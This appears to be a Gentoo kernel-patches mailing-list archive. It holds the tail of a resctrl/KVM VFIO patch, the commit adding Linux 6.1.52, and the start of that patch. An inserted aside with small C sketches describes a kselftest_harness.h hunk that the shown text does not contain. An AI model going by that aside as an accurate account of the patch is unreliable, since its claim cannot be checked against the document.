+ 					 memflush, operation, resctrl_val)) {
+ 				fprintf(stderr, "Error-running fill buffer\n");
+ 				ret = -1;
+-				break;
++				goto pe_close;
+ 			}
+ 
+ 			sleep(1);
+ 			ret = measure_cache_vals(param, bm_pid);
+ 			if (ret)
+-				break;
++				goto pe_close;
++
++			close(fd_lm);
+ 		} else {
+ 			break;
+ 		}
+ 	}
+ 
+ 	return ret;
++
++pe_close:
++	close(fd_lm);
++	return ret;
+ }
+ 
+ /*
+diff --git a/tools/testing/selftests/resctrl/fill_buf.c b/tools/testing/selftests/resctrl/fill_buf.c
+index c20d0a7ecbe63..ab1d91328d67b 100644
+--- a/tools/testing/selftests/resctrl/fill_buf.c
++++ b/tools/testing/selftests/resctrl/fill_buf.c
+@@ -184,12 +184,13 @@ fill_cache(unsigned long long buf_size, int malloc_and_init, int memflush,
+ 	else
+ 		ret = fill_cache_write(start_ptr, end_ptr, resctrl_val);
+ 
++	free(startptr);
++
+ 	if (ret) {
+ 		printf("\n Error in fill cache read/write...\n");
+ 		return -1;
+ 	}
+ 
+-	free(startptr);
+ 
+ 	return 0;
+ }
+diff --git a/tools/testing/selftests/resctrl/resctrl.h b/tools/testing/selftests/resctrl/resctrl.h
+index f44fa2de4d986..dbe5cfb545585 100644
+--- a/tools/testing/selftests/resctrl/resctrl.h
++++ b/tools/testing/selftests/resctrl/resctrl.h
+@@ -43,6 +43,7 @@
+ 	do {					\
+ 		perror(err_msg);		\
+ 		kill(ppid, SIGKILL);		\
++		umount_resctrlfs();		\
+ 		exit(EXIT_FAILURE);		\
+ 	} while (0)
+ 
+diff --git a/virt/kvm/vfio.c b/virt/kvm/vfio.c
+index 9584eb57e0eda..365d30779768a 100644
+--- a/virt/kvm/vfio.c
++++ b/virt/kvm/vfio.c
+@@ -21,7 +21,7 @@
+ #include <asm/kvm_ppc.h>
+ #endif
+ 
+-struct kvm_vfio_group {
++struct kvm_vfio_file {
+ 	struct list_head node;
+ 	struct file *file;
+ #ifdef CONFIG_SPAPR_TCE_IOMMU
+@@ -30,7 +30,7 @@ struct kvm_vfio_group {
+ };
+ 
+ struct kvm_vfio {
+-	struct list_head group_list;
++	struct list_head file_list;
+ 	struct mutex lock;
+ 	bool noncoherent;
+ };
+@@ -98,34 +98,35 @@ static struct iommu_group *kvm_vfio_file_iommu_group(struct file *file)
+ }
+ 
+ static void kvm_spapr_tce_release_vfio_group(struct kvm *kvm,
+-					     struct kvm_vfio_group *kvg)
++					     struct kvm_vfio_file *kvf)
+ {
+-	if (WARN_ON_ONCE(!kvg->iommu_group))
++	if (WARN_ON_ONCE(!kvf->iommu_group))
+ 		return;
+ 
+-	kvm_spapr_tce_release_iommu_group(kvm, kvg->iommu_group);
+-	iommu_group_put(kvg->iommu_group);
+-	kvg->iommu_group = NULL;
++	kvm_spapr_tce_release_iommu_group(kvm, kvf->iommu_group);
++	iommu_group_put(kvf->iommu_group);
++	kvf->iommu_group = NULL;
+ }
+ #endif
+ 
+ /*
+- * Groups can use the same or different IOMMU domains.  If the same then
+- * adding a new group may change the coherency of groups we've previously
+- * been told about.  We don't want to care about any of that so we retest
+- * each group and bail as soon as we find one that's noncoherent.  This
+- * means we only ever [un]register_noncoherent_dma once for the whole device.
++ * Groups/devices can use the same or different IOMMU domains. If the same
++ * then adding a new group/device may change the coherency of groups/devices
++ * we've previously been told about. We don't want to care about any of
++ * that so we retest each group/device and bail as soon as we find one that's
++ * noncoherent.  This means we only ever [un]register_noncoherent_dma once
++ * for the whole device.
+  */
+ static void kvm_vfio_update_coherency(struct kvm_device *dev)
+ {
+ 	struct kvm_vfio *kv = dev->private;
+ 	bool noncoherent = false;
+-	struct kvm_vfio_group *kvg;
++	struct kvm_vfio_file *kvf;
+ 
+ 	mutex_lock(&kv->lock);
+ 
+-	list_for_each_entry(kvg, &kv->group_list, node) {
+-		if (!kvm_vfio_file_enforced_coherent(kvg->file)) {
++	list_for_each_entry(kvf, &kv->file_list, node) {
++		if (!kvm_vfio_file_enforced_coherent(kvf->file)) {
+ 			noncoherent = true;
+ 			break;
+ 		}
+@@ -143,10 +144,10 @@ static void kvm_vfio_update_coherency(struct kvm_device *dev)
+ 	mutex_unlock(&kv->lock);
+ }
+ 
+-static int kvm_vfio_group_add(struct kvm_device *dev, unsigned int fd)
++static int kvm_vfio_file_add(struct kvm_device *dev, unsigned int fd)
+ {
+ 	struct kvm_vfio *kv = dev->private;
+-	struct kvm_vfio_group *kvg;
++	struct kvm_vfio_file *kvf;
+ 	struct file *filp;
+ 	int ret;
+ 
+@@ -162,27 +163,27 @@ static int kvm_vfio_group_add(struct kvm_device *dev, unsigned int fd)
+ 
+ 	mutex_lock(&kv->lock);
+ 
+-	list_for_each_entry(kvg, &kv->group_list, node) {
+-		if (kvg->file == filp) {
++	list_for_each_entry(kvf, &kv->file_list, node) {
++		if (kvf->file == filp) {
+ 			ret = -EEXIST;
+ 			goto err_unlock;
+ 		}
+ 	}
+ 
+-	kvg = kzalloc(sizeof(*kvg), GFP_KERNEL_ACCOUNT);
+-	if (!kvg) {
++	kvf = kzalloc(sizeof(*kvf), GFP_KERNEL_ACCOUNT);
++	if (!kvf) {
+ 		ret = -ENOMEM;
+ 		goto err_unlock;
+ 	}
+ 
+-	kvg->file = filp;
+-	list_add_tail(&kvg->node, &kv->group_list);
++	kvf->file = filp;
++	list_add_tail(&kvf->node, &kv->file_list);
+ 
+ 	kvm_arch_start_assignment(dev->kvm);
++	kvm_vfio_file_set_kvm(kvf->file, dev->kvm);
+ 
+ 	mutex_unlock(&kv->lock);
+ 
+-	kvm_vfio_file_set_kvm(kvg->file, dev->kvm);
+ 	kvm_vfio_update_coherency(dev);
+ 
+ 	return 0;
+@@ -193,10 +194,10 @@ err_fput:
+ 	return ret;
+ }
+ 
+-static int kvm_vfio_group_del(struct kvm_device *dev, unsigned int fd)
++static int kvm_vfio_file_del(struct kvm_device *dev, unsigned int fd)
+ {
+ 	struct kvm_vfio *kv = dev->private;
+-	struct kvm_vfio_group *kvg;
++	struct kvm_vfio_file *kvf;
+ 	struct fd f;
+ 	int ret;
+ 
+@@ -208,18 +209,18 @@ static int kvm_vfio_group_del(struct kvm_device *dev, unsigned int fd)
+ 
+ 	mutex_lock(&kv->lock);
+ 
+-	list_for_each_entry(kvg, &kv->group_list, node) {
+-		if (kvg->file != f.file)
++	list_for_each_entry(kvf, &kv->file_list, node) {
++		if (kvf->file != f.file)
+ 			continue;
+ 
+-		list_del(&kvg->node);
++		list_del(&kvf->node);
+ 		kvm_arch_end_assignment(dev->kvm);
+ #ifdef CONFIG_SPAPR_TCE_IOMMU
+-		kvm_spapr_tce_release_vfio_group(dev->kvm, kvg);
++		kvm_spapr_tce_release_vfio_group(dev->kvm, kvf);
+ #endif
+-		kvm_vfio_file_set_kvm(kvg->file, NULL);
+-		fput(kvg->file);
+-		kfree(kvg);
++		kvm_vfio_file_set_kvm(kvf->file, NULL);
++		fput(kvf->file);
++		kfree(kvf);
+ 		ret = 0;
+ 		break;
+ 	}
+@@ -234,12 +235,12 @@ static int kvm_vfio_group_del(struct kvm_device *dev, unsigned int fd)
+ }
+ 
+ #ifdef CONFIG_SPAPR_TCE_IOMMU
+-static int kvm_vfio_group_set_spapr_tce(struct kvm_device *dev,
+-					void __user *arg)
++static int kvm_vfio_file_set_spapr_tce(struct kvm_device *dev,
++				       void __user *arg)
+ {
+ 	struct kvm_vfio_spapr_tce param;
+ 	struct kvm_vfio *kv = dev->private;
+-	struct kvm_vfio_group *kvg;
++	struct kvm_vfio_file *kvf;
+ 	struct fd f;
+ 	int ret;
+ 
+@@ -254,20 +255,20 @@ static int kvm_vfio_group_set_spapr_tce(struct kvm_device *dev,
+ 
+ 	mutex_lock(&kv->lock);
+ 
+-	list_for_each_entry(kvg, &kv->group_list, node) {
+-		if (kvg->file != f.file)
++	list_for_each_entry(kvf, &kv->file_list, node) {
++		if (kvf->file != f.file)
+ 			continue;
+ 
+-		if (!kvg->iommu_group) {
+-			kvg->iommu_group = kvm_vfio_file_iommu_group(kvg->file);
+-			if (WARN_ON_ONCE(!kvg->iommu_group)) {
++		if (!kvf->iommu_group) {
++			kvf->iommu_group = kvm_vfio_file_iommu_group(kvf->file);
++			if (WARN_ON_ONCE(!kvf->iommu_group)) {
+ 				ret = -EIO;
+ 				goto err_fdput;
+ 			}
+ 		}
+ 
+ 		ret = kvm_spapr_tce_attach_iommu_group(dev->kvm, param.tablefd,
+-						       kvg->iommu_group);
++						       kvf->iommu_group);
+ 		break;
+ 	}
+ 
+@@ -278,8 +279,8 @@ err_fdput:
+ }
+ #endif
+ 
+-static int kvm_vfio_set_group(struct kvm_device *dev, long attr,
+-			      void __user *arg)
++static int kvm_vfio_set_file(struct kvm_device *dev, long attr,
++			     void __user *arg)
+ {
+ 	int32_t __user *argp = arg;
+ 	int32_t fd;
+@@ -288,16 +289,16 @@ static int kvm_vfio_set_group(struct kvm_device *dev, long attr,
+ 	case KVM_DEV_VFIO_GROUP_ADD:
+ 		if (get_user(fd, argp))
+ 			return -EFAULT;
+-		return kvm_vfio_group_add(dev, fd);
++		return kvm_vfio_file_add(dev, fd);
+ 
+ 	case KVM_DEV_VFIO_GROUP_DEL:
+ 		if (get_user(fd, argp))
+ 			return -EFAULT;
+-		return kvm_vfio_group_del(dev, fd);
++		return kvm_vfio_file_del(dev, fd);
+ 
+ #ifdef CONFIG_SPAPR_TCE_IOMMU
+ 	case KVM_DEV_VFIO_GROUP_SET_SPAPR_TCE:
+-		return kvm_vfio_group_set_spapr_tce(dev, arg);
++		return kvm_vfio_file_set_spapr_tce(dev, arg);
+ #endif
+ 	}
+ 
+@@ -309,8 +310,8 @@ static int kvm_vfio_set_attr(struct kvm_device *dev,
+ {
+ 	switch (attr->group) {
+ 	case KVM_DEV_VFIO_GROUP:
+-		return kvm_vfio_set_group(dev, attr->attr,
+-					  u64_to_user_ptr(attr->addr));
++		return kvm_vfio_set_file(dev, attr->attr,
++					 u64_to_user_ptr(attr->addr));
+ 	}
+ 
+ 	return -ENXIO;
+@@ -339,16 +340,16 @@ static int kvm_vfio_has_attr(struct kvm_device *dev,
+ static void kvm_vfio_release(struct kvm_device *dev)
+ {
+ 	struct kvm_vfio *kv = dev->private;
+-	struct kvm_vfio_group *kvg, *tmp;
++	struct kvm_vfio_file *kvf, *tmp;
+ 
+-	list_for_each_entry_safe(kvg, tmp, &kv->group_list, node) {
++	list_for_each_entry_safe(kvf, tmp, &kv->file_list, node) {
+ #ifdef CONFIG_SPAPR_TCE_IOMMU
+-		kvm_spapr_tce_release_vfio_group(dev->kvm, kvg);
++		kvm_spapr_tce_release_vfio_group(dev->kvm, kvf);
+ #endif
+-		kvm_vfio_file_set_kvm(kvg->file, NULL);
+-		fput(kvg->file);
+-		list_del(&kvg->node);
+-		kfree(kvg);
++		kvm_vfio_file_set_kvm(kvf->file, NULL);
++		fput(kvf->file);
++		list_del(&kvf->node);
++		kfree(kvf);
+ 		kvm_arch_end_assignment(dev->kvm);
+ 	}
+ 
+@@ -382,7 +383,7 @@ static int kvm_vfio_create(struct kvm_device *dev, u32 type)
+ 	if (!kv)
+ 		return -ENOMEM;
+ 
+-	INIT_LIST_HEAD(&kv->group_list);
++	INIT_LIST_HEAD(&kv->file_list);
+ 	mutex_init(&kv->lock);
+ 
+ 	dev->private = kv;
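
Aside, not part of the committed patch above: the kselftest_harness.h hunk moves the exit-code-255 check ahead of the termsig branch, so a child that skips is reported as SKIP even when a termination signal was expected. A minimal standalone sketch of that decode order (the fork/waitpid harness here is illustrative, not the selftest code):

#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
	int status;
	pid_t pid = fork();

	if (pid == 0)
		exit(255);	/* child signals SKIP, as in the harness */

	waitpid(pid, &status, 0);
	if (WIFEXITED(status)) {
		if (WEXITSTATUS(status) == 255)		/* SKIP checked first... */
			puts("skip");
		else if (WEXITSTATUS(status) == 0)	/* ...then pass/fail */
			puts("pass");
		else
			puts("fail");
	}
	return 0;
}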

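Similarly, the resctrl cache.c hunks funnel every exit from the measurement loop through a label that closes the perf fd, so the descriptor is released exactly once on success and on error alike. The same cleanup pattern in a self-contained userspace form (the path read here is illustrative only):

#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

static int measure_once(const char *path)
{
	char buf[64];
	int ret, fd;

	fd = open(path, O_RDONLY);
	if (fd == -1) {
		perror("open");
		return -1;
	}

	ret = read(fd, buf, sizeof(buf));
	if (ret == -1) {
		perror("read");
		goto out_close;	/* error path funnels into the cleanup */
	}
	ret = 0;

out_close:
	close(fd);	/* one close() covers success and failure */
	return ret;
}

int main(void)
{
	return measure_once("/proc/self/status") ? 1 : 0;
}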

* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-09-06 22:16 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-09-06 22:16 UTC (permalink / raw
  To: gentoo-commits

commit:     ac6e318860d1a3ad84655aaa24fb455f7b092bc0
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Sep  6 22:15:50 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Sep  6 22:15:50 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=ac6e3188

Linux patch 6.1.52

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |   4 +
 1051_linux-6.1.52.patch | 957 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 961 insertions(+)

diff --git a/0000_README b/0000_README
index 641d98d3..9d50d635 100644
--- a/0000_README
+++ b/0000_README
@@ -247,6 +247,10 @@ Patch:  1050_linux-6.1.51.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.51
 
+Patch:  1051_linux-6.1.52.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.52
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1051_linux-6.1.52.patch b/1051_linux-6.1.52.patch
new file mode 100644
index 00000000..11ad1175
--- /dev/null
+++ b/1051_linux-6.1.52.patch
@@ -0,0 +1,957 @@
+diff --git a/Documentation/devicetree/bindings/serial/nxp,sc16is7xx.txt b/Documentation/devicetree/bindings/serial/nxp,sc16is7xx.txt
+index 0fa8e3e43bf80..1a7e4bff0456f 100644
+--- a/Documentation/devicetree/bindings/serial/nxp,sc16is7xx.txt
++++ b/Documentation/devicetree/bindings/serial/nxp,sc16is7xx.txt
+@@ -23,6 +23,9 @@ Optional properties:
+     1 = active low.
+ - irda-mode-ports: An array that lists the indices of the port that
+ 		   should operate in IrDA mode.
++- nxp,modem-control-line-ports: An array that lists the indices of the port that
++				should have shared GPIO lines configured as
++				modem control lines.
+ 
+ Example:
+         sc16is750: sc16is750@51 {
+@@ -35,6 +38,26 @@ Example:
+                 #gpio-cells = <2>;
+         };
+ 
++	sc16is752: sc16is752@53 {
++		compatible = "nxp,sc16is752";
++		reg = <0x53>;
++		clocks = <&clk20m>;
++		interrupt-parent = <&gpio3>;
++		interrupts = <7 IRQ_TYPE_EDGE_FALLING>;
++		nxp,modem-control-line-ports = <1>; /* Port 1 as modem control lines */
++		gpio-controller; /* Port 0 as GPIOs */
++		#gpio-cells = <2>;
++	};
++
++	sc16is752: sc16is752@54 {
++		compatible = "nxp,sc16is752";
++		reg = <0x54>;
++		clocks = <&clk20m>;
++		interrupt-parent = <&gpio3>;
++		interrupts = <7 IRQ_TYPE_EDGE_FALLING>;
++		nxp,modem-control-line-ports = <0 1>; /* Ports 0 and 1 as modem control lines */
++	};
++
+ * spi as bus
+ 
+ Required properties:
+@@ -59,6 +82,9 @@ Optional properties:
+     1 = active low.
+ - irda-mode-ports: An array that lists the indices of the port that
+ 		   should operate in IrDA mode.
++- nxp,modem-control-line-ports: An array that lists the indices of the port that
++				should have shared GPIO lines configured as
++				modem control lines.
+ 
+ Example:
+ 	sc16is750: sc16is750@0 {
+@@ -70,3 +96,23 @@ Example:
+ 		gpio-controller;
+ 		#gpio-cells = <2>;
+ 	};
++
++	sc16is752: sc16is752@1 {
++		compatible = "nxp,sc16is752";
++		reg = <1>;
++		clocks = <&clk20m>;
++		interrupt-parent = <&gpio3>;
++		interrupts = <7 IRQ_TYPE_EDGE_FALLING>;
++		nxp,modem-control-line-ports = <1>; /* Port 1 as modem control lines */
++		gpio-controller; /* Port 0 as GPIOs */
++		#gpio-cells = <2>;
++	};
++
++	sc16is752: sc16is752@2 {
++		compatible = "nxp,sc16is752";
++		reg = <2>;
++		clocks = <&clk20m>;
++		interrupt-parent = <&gpio3>;
++		interrupts = <7 IRQ_TYPE_EDGE_FALLING>;
++		nxp,modem-control-line-ports = <0 1>; /* Ports 0 and 1 as modem control lines */
++	};
+diff --git a/Makefile b/Makefile
+index e7c344d5af156..82aaa3ae7395b 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 51
++SUBLEVEL = 52
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/mach-pxa/sharpsl_pm.c b/arch/arm/mach-pxa/sharpsl_pm.c
+index a829baf8d9226..05c0a0f6fe630 100644
+--- a/arch/arm/mach-pxa/sharpsl_pm.c
++++ b/arch/arm/mach-pxa/sharpsl_pm.c
+@@ -220,8 +220,6 @@ void sharpsl_battery_kick(void)
+ {
+ 	schedule_delayed_work(&sharpsl_bat, msecs_to_jiffies(125));
+ }
+-EXPORT_SYMBOL(sharpsl_battery_kick);
+-
+ 
+ static void sharpsl_battery_thread(struct work_struct *private_)
+ {
+diff --git a/arch/arm/mach-pxa/spitz.c b/arch/arm/mach-pxa/spitz.c
+index 9964729cd428f..937f56bbaf6c6 100644
+--- a/arch/arm/mach-pxa/spitz.c
++++ b/arch/arm/mach-pxa/spitz.c
+@@ -9,7 +9,6 @@
+  */
+ 
+ #include <linux/kernel.h>
+-#include <linux/module.h>	/* symbol_get ; symbol_put */
+ #include <linux/platform_device.h>
+ #include <linux/delay.h>
+ #include <linux/gpio_keys.h>
+@@ -510,17 +509,6 @@ static struct ads7846_platform_data spitz_ads7846_info = {
+ 	.wait_for_sync		= spitz_ads7846_wait_for_hsync,
+ };
+ 
+-static void spitz_bl_kick_battery(void)
+-{
+-	void (*kick_batt)(void);
+-
+-	kick_batt = symbol_get(sharpsl_battery_kick);
+-	if (kick_batt) {
+-		kick_batt();
+-		symbol_put(sharpsl_battery_kick);
+-	}
+-}
+-
+ static struct gpiod_lookup_table spitz_lcdcon_gpio_table = {
+ 	.dev_id = "spi2.1",
+ 	.table = {
+@@ -548,7 +536,7 @@ static struct corgi_lcd_platform_data spitz_lcdcon_info = {
+ 	.max_intensity		= 0x2f,
+ 	.default_intensity	= 0x1f,
+ 	.limit_mask		= 0x0b,
+-	.kick_battery		= spitz_bl_kick_battery,
++	.kick_battery		= sharpsl_battery_kick,
+ };
+ 
+ static struct spi_board_info spitz_spi_devices[] = {
+diff --git a/arch/mips/alchemy/devboards/db1000.c b/arch/mips/alchemy/devboards/db1000.c
+index 2c52ee27b4f25..50de86eb8784c 100644
+--- a/arch/mips/alchemy/devboards/db1000.c
++++ b/arch/mips/alchemy/devboards/db1000.c
+@@ -14,7 +14,6 @@
+ #include <linux/interrupt.h>
+ #include <linux/leds.h>
+ #include <linux/mmc/host.h>
+-#include <linux/module.h>
+ #include <linux/platform_device.h>
+ #include <linux/pm.h>
+ #include <linux/spi/spi.h>
+@@ -167,12 +166,7 @@ static struct platform_device db1x00_audio_dev = {
+ 
+ static irqreturn_t db1100_mmc_cd(int irq, void *ptr)
+ {
+-	void (*mmc_cd)(struct mmc_host *, unsigned long);
+-	/* link against CONFIG_MMC=m */
+-	mmc_cd = symbol_get(mmc_detect_change);
+-	mmc_cd(ptr, msecs_to_jiffies(500));
+-	symbol_put(mmc_detect_change);
+-
++	mmc_detect_change(ptr, msecs_to_jiffies(500));
+ 	return IRQ_HANDLED;
+ }
+ 
+diff --git a/arch/mips/alchemy/devboards/db1200.c b/arch/mips/alchemy/devboards/db1200.c
+index 1864eb935ca57..76080c71a2a7b 100644
+--- a/arch/mips/alchemy/devboards/db1200.c
++++ b/arch/mips/alchemy/devboards/db1200.c
+@@ -10,7 +10,6 @@
+ #include <linux/gpio.h>
+ #include <linux/i2c.h>
+ #include <linux/init.h>
+-#include <linux/module.h>
+ #include <linux/interrupt.h>
+ #include <linux/io.h>
+ #include <linux/leds.h>
+@@ -340,14 +339,7 @@ static irqreturn_t db1200_mmc_cd(int irq, void *ptr)
+ 
+ static irqreturn_t db1200_mmc_cdfn(int irq, void *ptr)
+ {
+-	void (*mmc_cd)(struct mmc_host *, unsigned long);
+-
+-	/* link against CONFIG_MMC=m */
+-	mmc_cd = symbol_get(mmc_detect_change);
+-	if (mmc_cd) {
+-		mmc_cd(ptr, msecs_to_jiffies(200));
+-		symbol_put(mmc_detect_change);
+-	}
++	mmc_detect_change(ptr, msecs_to_jiffies(200));
+ 
+ 	msleep(100);	/* debounce */
+ 	if (irq == DB1200_SD0_INSERT_INT)
+@@ -431,14 +423,7 @@ static irqreturn_t pb1200_mmc1_cd(int irq, void *ptr)
+ 
+ static irqreturn_t pb1200_mmc1_cdfn(int irq, void *ptr)
+ {
+-	void (*mmc_cd)(struct mmc_host *, unsigned long);
+-
+-	/* link against CONFIG_MMC=m */
+-	mmc_cd = symbol_get(mmc_detect_change);
+-	if (mmc_cd) {
+-		mmc_cd(ptr, msecs_to_jiffies(200));
+-		symbol_put(mmc_detect_change);
+-	}
++	mmc_detect_change(ptr, msecs_to_jiffies(200));
+ 
+ 	msleep(100);	/* debounce */
+ 	if (irq == PB1200_SD1_INSERT_INT)
+diff --git a/arch/mips/alchemy/devboards/db1300.c b/arch/mips/alchemy/devboards/db1300.c
+index e70e529ddd914..ff61901329c62 100644
+--- a/arch/mips/alchemy/devboards/db1300.c
++++ b/arch/mips/alchemy/devboards/db1300.c
+@@ -17,7 +17,6 @@
+ #include <linux/interrupt.h>
+ #include <linux/ata_platform.h>
+ #include <linux/mmc/host.h>
+-#include <linux/module.h>
+ #include <linux/mtd/mtd.h>
+ #include <linux/mtd/platnand.h>
+ #include <linux/platform_device.h>
+@@ -459,14 +458,7 @@ static irqreturn_t db1300_mmc_cd(int irq, void *ptr)
+ 
+ static irqreturn_t db1300_mmc_cdfn(int irq, void *ptr)
+ {
+-	void (*mmc_cd)(struct mmc_host *, unsigned long);
+-
+-	/* link against CONFIG_MMC=m.  We can only be called once MMC core has
+-	 * initialized the controller, so symbol_get() should always succeed.
+-	 */
+-	mmc_cd = symbol_get(mmc_detect_change);
+-	mmc_cd(ptr, msecs_to_jiffies(200));
+-	symbol_put(mmc_detect_change);
++	mmc_detect_change(ptr, msecs_to_jiffies(200));
+ 
+ 	msleep(100);	/* debounce */
+ 	if (irq == DB1300_SD1_INSERT_INT)
+diff --git a/drivers/bluetooth/btsdio.c b/drivers/bluetooth/btsdio.c
+index 795be33f2892d..f19d31ee37ea8 100644
+--- a/drivers/bluetooth/btsdio.c
++++ b/drivers/bluetooth/btsdio.c
+@@ -357,6 +357,7 @@ static void btsdio_remove(struct sdio_func *func)
+ 	if (!data)
+ 		return;
+ 
++	cancel_work_sync(&data->work);
+ 	hdev = data->hdev;
+ 
+ 	sdio_set_drvdata(func, NULL);
+diff --git a/drivers/firmware/stratix10-svc.c b/drivers/firmware/stratix10-svc.c
+index 2d674126160fe..cab11af28c231 100644
+--- a/drivers/firmware/stratix10-svc.c
++++ b/drivers/firmware/stratix10-svc.c
+@@ -756,7 +756,7 @@ svc_create_memory_pool(struct platform_device *pdev,
+ 	paddr = begin;
+ 	size = end - begin;
+ 	va = devm_memremap(dev, paddr, size, MEMREMAP_WC);
+-	if (!va) {
++	if (IS_ERR(va)) {
+ 		dev_err(dev, "fail to remap shared memory\n");
+ 		return ERR_PTR(-EINVAL);
+ 	}
+diff --git a/drivers/fsi/fsi-master-ast-cf.c b/drivers/fsi/fsi-master-ast-cf.c
+index 5f608ef8b53ca..cde281ec89d7b 100644
+--- a/drivers/fsi/fsi-master-ast-cf.c
++++ b/drivers/fsi/fsi-master-ast-cf.c
+@@ -1441,3 +1441,4 @@ static struct platform_driver fsi_master_acf = {
+ 
+ module_platform_driver(fsi_master_acf);
+ MODULE_LICENSE("GPL");
++MODULE_FIRMWARE(FW_FILE_NAME);
+diff --git a/drivers/hid/wacom.h b/drivers/hid/wacom.h
+index 4da50e19808ef..166a76c9bcad3 100644
+--- a/drivers/hid/wacom.h
++++ b/drivers/hid/wacom.h
+@@ -150,6 +150,7 @@ struct wacom_remote {
+ 		struct input_dev *input;
+ 		bool registered;
+ 		struct wacom_battery battery;
++		ktime_t active_time;
+ 	} remotes[WACOM_MAX_REMOTES];
+ };
+ 
+diff --git a/drivers/hid/wacom_sys.c b/drivers/hid/wacom_sys.c
+index aff4a21a46b6a..af163e8dfec07 100644
+--- a/drivers/hid/wacom_sys.c
++++ b/drivers/hid/wacom_sys.c
+@@ -2527,6 +2527,18 @@ fail:
+ 	return;
+ }
+ 
++static void wacom_remote_destroy_battery(struct wacom *wacom, int index)
++{
++	struct wacom_remote *remote = wacom->remote;
++
++	if (remote->remotes[index].battery.battery) {
++		devres_release_group(&wacom->hdev->dev,
++				     &remote->remotes[index].battery.bat_desc);
++		remote->remotes[index].battery.battery = NULL;
++		remote->remotes[index].active_time = 0;
++	}
++}
++
+ static void wacom_remote_destroy_one(struct wacom *wacom, unsigned int index)
+ {
+ 	struct wacom_remote *remote = wacom->remote;
+@@ -2541,9 +2553,7 @@ static void wacom_remote_destroy_one(struct wacom *wacom, unsigned int index)
+ 			remote->remotes[i].registered = false;
+ 			spin_unlock_irqrestore(&remote->remote_lock, flags);
+ 
+-			if (remote->remotes[i].battery.battery)
+-				devres_release_group(&wacom->hdev->dev,
+-						     &remote->remotes[i].battery.bat_desc);
++			wacom_remote_destroy_battery(wacom, i);
+ 
+ 			if (remote->remotes[i].group.name)
+ 				devres_release_group(&wacom->hdev->dev,
+@@ -2551,7 +2561,6 @@ static void wacom_remote_destroy_one(struct wacom *wacom, unsigned int index)
+ 
+ 			remote->remotes[i].serial = 0;
+ 			remote->remotes[i].group.name = NULL;
+-			remote->remotes[i].battery.battery = NULL;
+ 			wacom->led.groups[i].select = WACOM_STATUS_UNKNOWN;
+ 		}
+ 	}
+@@ -2636,6 +2645,9 @@ static int wacom_remote_attach_battery(struct wacom *wacom, int index)
+ 	if (remote->remotes[index].battery.battery)
+ 		return 0;
+ 
++	if (!remote->remotes[index].active_time)
++		return 0;
++
+ 	if (wacom->led.groups[index].select == WACOM_STATUS_UNKNOWN)
+ 		return 0;
+ 
+@@ -2651,6 +2663,7 @@ static void wacom_remote_work(struct work_struct *work)
+ {
+ 	struct wacom *wacom = container_of(work, struct wacom, remote_work);
+ 	struct wacom_remote *remote = wacom->remote;
++	ktime_t kt = ktime_get();
+ 	struct wacom_remote_data data;
+ 	unsigned long flags;
+ 	unsigned int count;
+@@ -2677,6 +2690,10 @@ static void wacom_remote_work(struct work_struct *work)
+ 		serial = data.remote[i].serial;
+ 		if (data.remote[i].connected) {
+ 
++			if (kt - remote->remotes[i].active_time > WACOM_REMOTE_BATTERY_TIMEOUT
++			    && remote->remotes[i].active_time != 0)
++				wacom_remote_destroy_battery(wacom, i);
++
+ 			if (remote->remotes[i].serial == serial) {
+ 				wacom_remote_attach_battery(wacom, i);
+ 				continue;
+diff --git a/drivers/hid/wacom_wac.c b/drivers/hid/wacom_wac.c
+index 15cd0cabee2a9..c1270db121784 100644
+--- a/drivers/hid/wacom_wac.c
++++ b/drivers/hid/wacom_wac.c
+@@ -1129,6 +1129,7 @@ static int wacom_remote_irq(struct wacom_wac *wacom_wac, size_t len)
+ 	if (index < 0 || !remote->remotes[index].registered)
+ 		goto out;
+ 
++	remote->remotes[i].active_time = ktime_get();
+ 	input = remote->remotes[index].input;
+ 
+ 	input_report_key(input, BTN_0, (data[9] & 0x01));
+diff --git a/drivers/hid/wacom_wac.h b/drivers/hid/wacom_wac.h
+index ee21bb260f22f..2e7cc5e7a0cb7 100644
+--- a/drivers/hid/wacom_wac.h
++++ b/drivers/hid/wacom_wac.h
+@@ -13,6 +13,7 @@
+ #define WACOM_NAME_MAX		64
+ #define WACOM_MAX_REMOTES	5
+ #define WACOM_STATUS_UNKNOWN	255
++#define WACOM_REMOTE_BATTERY_TIMEOUT	21000000000ll
+ 
+ /* packet length for individual models */
+ #define WACOM_PKGLEN_BBFUN	 9
+diff --git a/drivers/mmc/host/Kconfig b/drivers/mmc/host/Kconfig
+index fb1062a6394c1..9b5a2cb110b3e 100644
+--- a/drivers/mmc/host/Kconfig
++++ b/drivers/mmc/host/Kconfig
+@@ -528,11 +528,12 @@ config MMC_ALCOR
+ 	  of Alcor Micro PCI-E card reader
+ 
+ config MMC_AU1X
+-	tristate "Alchemy AU1XX0 MMC Card Interface support"
++	bool "Alchemy AU1XX0 MMC Card Interface support"
+ 	depends on MIPS_ALCHEMY
++	depends on MMC=y
+ 	help
+ 	  This selects the AMD Alchemy(R) Multimedia card interface.
+-	  If you have a Alchemy platform with a MMC slot, say Y or M here.
++	  If you have a Alchemy platform with a MMC slot, say Y here.
+ 
+ 	  If unsure, say N.
+ 
+diff --git a/drivers/net/ethernet/freescale/enetc/enetc_ptp.c b/drivers/net/ethernet/freescale/enetc/enetc_ptp.c
+index 17c097cef7d45..5243fc0310589 100644
